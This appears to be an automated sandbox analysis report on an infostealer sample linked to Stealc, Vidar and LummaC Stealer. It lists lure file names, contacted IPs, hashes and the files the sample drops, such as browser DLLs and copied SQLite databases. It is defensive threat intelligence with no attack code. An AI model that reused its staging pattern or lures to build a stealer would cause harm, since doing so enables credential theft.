	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	13.107.246.63 40.126.53.11 23.218.208.109 20.12.23.50
	http://sarcomawmawlhov7o5mdhz4eszxxlkyaoiyiy2b5iwxnds2dmb4jakad.onion	Get hash	malicious	Unknown	Browse	13.107.246.63 40.126.53.11 23.218.208.109 20.12.23.50
	List of required items pdf.vbs	Get hash	malicious	GuLoader	Browse	13.107.246.63 40.126.53.11 23.218.208.109 20.12.23.50
	List of required items.vbs	Get hash	malicious	Unknown	Browse	13.107.246.63 40.126.53.11 23.218.208.109 20.12.23.50
	List of required items and services pdf.vbs	Get hash	malicious	GuLoader	Browse	13.107.246.63 40.126.53.11 23.218.208.109 20.12.23.50
	List of Required items and specifications.pdf.vbs	Get hash	malicious	Unknown	Browse	13.107.246.63 40.126.53.11 23.218.208.109 20.12.23.50
	3qvTuHPZz2.exe	Get hash	malicious	Meduza Stealer	Browse	13.107.246.63 40.126.53.11 23.218.208.109 20.12.23.50
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63 40.126.53.11 23.218.208.109 20.12.23.50
6271f898ce5be7dd52b0fc260d0662b3	3qvTuHPZz2.exe	Get hash	malicious	Meduza Stealer	Browse	150.171.27.10 20.234.120.54 20.223.36.55 150.171.28.10 23.206.197.42 23.206.197.26
	73cceb_de0cf39691b24825b9733575e081f7fa.rtf	Get hash	malicious	Unknown	Browse	150.171.27.10 20.234.120.54 20.223.36.55 150.171.28.10 23.206.197.42 23.206.197.26
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	150.171.27.10 20.234.120.54 20.223.36.55 150.171.28.10 23.206.197.42 23.206.197.26
	Outstanding_Payment.vbs	Get hash	malicious	XenoRAT	Browse	150.171.27.10 20.234.120.54 20.223.36.55 150.171.28.10 23.206.197.42 23.206.197.26
	Outstanding_Payment.vbs_.vbs	Get hash	malicious	XenoRAT	Browse	150.171.27.10 20.234.120.54 20.223.36.55 150.171.28.10 23.206.197.42 23.206.197.26
	Outstanding_Payment.vbs_.vbs	Get hash	malicious	XenoRAT	Browse	150.171.27.10 20.234.120.54 20.223.36.55 150.171.28.10 23.206.197.42 23.206.197.26
	file.exe	Get hash	malicious	LummaC Stealer	Browse	150.171.27.10 20.234.120.54 20.223.36.55 150.171.28.10 23.206.197.42 23.206.197.26
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	150.171.27.10 20.234.120.54 20.223.36.55 150.171.28.10 23.206.197.42 23.206.197.26
	BGM LAW GROUP - RFP 2024.pdf	Get hash	malicious	Unknown	Browse	150.171.27.10 20.234.120.54 20.223.36.55 150.171.28.10 23.206.197.42 23.206.197.26
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	150.171.27.10 20.234.120.54 20.223.36.55 150.171.28.10 23.206.197.42 23.206.197.26
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.16.9
	List of required items pdf.vbs	Get hash	malicious	GuLoader	Browse	104.21.16.9
	List of required items.vbs	Get hash	malicious	Unknown	Browse	104.21.16.9
	List of required items and services pdf.vbs	Get hash	malicious	GuLoader	Browse	104.21.16.9
	List of Required items and specifications.pdf.vbs	Get hash	malicious	Unknown	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	Q8o0Mx52Fd.exe	Get hash	malicious	Unknown	Browse	104.21.16.9

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	S1NrYNOYhZ.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, CredGrabber, LummaC Stealer, Meduza Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BAEBFIIECBGCBGDHCAFC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBFBFBGDBKJJKFIEHJDB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10237
Entropy (8bit):	5.498288591230544
Encrypted:	false
SSDEEP:	192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:	0F58C61DE9618A1B53735181E43EE166
SHA1:	CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:	DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DHJJEGHIIDAFIDHJDHJEBAEGHC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBFHJEGD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GCGDHJDA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEGIDHJKKJDGCBGCGIJKKECAAE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKJDGDHIDBGIECBGHJDB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: S1NrYNOYhZ.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0856415d-b821-49e4-83c1-3edc7c85c904.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.0897499588404616
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kW0di1zNtPMpkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynYWkzItSmd6qE7lFoC
MD5:	18E1D869886288B3650E72792F51D94E
SHA1:	D630AC0CD91EA750B94E9D2E10898667FD650331
SHA-256:	9A5A26DB677D4A4B82D1D8B99582895712FE0BD1A55034B63FA1E4D63E7AAC21
SHA-512:	21DE97B0F3990D9B2FD1790AFC3536DB6B5BE1ED82BBD08317D67F87A884CC47EC91BA7031DA9320D58947573B5AFEE86236069D0AE7D515C9303ABF450E3CB3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\42c89907-2fe3-420a-8603-64ea9c45a7f3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44898
Entropy (8bit):	6.095331013363618
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWaQi1zNt+89djNgiipPFDkKJDSgzMMd6qD47u3+CiB:+/Ps+wsI7ynVVDKtSmd6qE7lFoC
MD5:	2246719187DC54AFB7885BFFF2A1A2E4
SHA1:	00237284FBB48915CD02A3039C7C39181B1E0DFB
SHA-256:	D2B1C84E0148DF5E2C2AA3A439586226B20391033B5294FF419D5CC5379A220D
SHA-512:	2AECA72856899504060FE34BE5C7485990930C0ED36CCF1FB540ABA52B307C8BB9483DD52B49D694B6CB608C85A5C473D572BF9958A6EDE573B1936A12AEA0AD
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\50c42de7-60e8-4354-a916-aaf20b4203a9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44898
Entropy (8bit):	6.095331013363618
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWaQi1zNt+89djNgiipPFDkKJDSgzMMd6qD47u3+CiB:+/Ps+wsI7ynVVDKtSmd6qE7lFoC
MD5:	2246719187DC54AFB7885BFFF2A1A2E4
SHA1:	00237284FBB48915CD02A3039C7C39181B1E0DFB
SHA-256:	D2B1C84E0148DF5E2C2AA3A439586226B20391033B5294FF419D5CC5379A220D
SHA-512:	2AECA72856899504060FE34BE5C7485990930C0ED36CCF1FB540ABA52B307C8BB9483DD52B49D694B6CB608C85A5C473D572BF9958A6EDE573B1936A12AEA0AD
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-675591A6-22E4.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.046708907487639555
Encrypted:	false
SSDEEP:	192:Q18h0m5tmLnOAtKYCUJgA8x5XSggykHzhuB0NEVIBdGRQchvMABeOxwWn8y08Tcp:A00UtssUgk5h60luxMAQOr08T2RGOD
MD5:	9EF8D20BD10EF56289F778D6AA8DBFF7
SHA1:	2E7787190D5F1B27D8B76E5A4539ED5D691774C2
SHA-256:	933E69F9D06B2BC906763272713C70EC66C8279120CF035DCF5B2774C03856EA
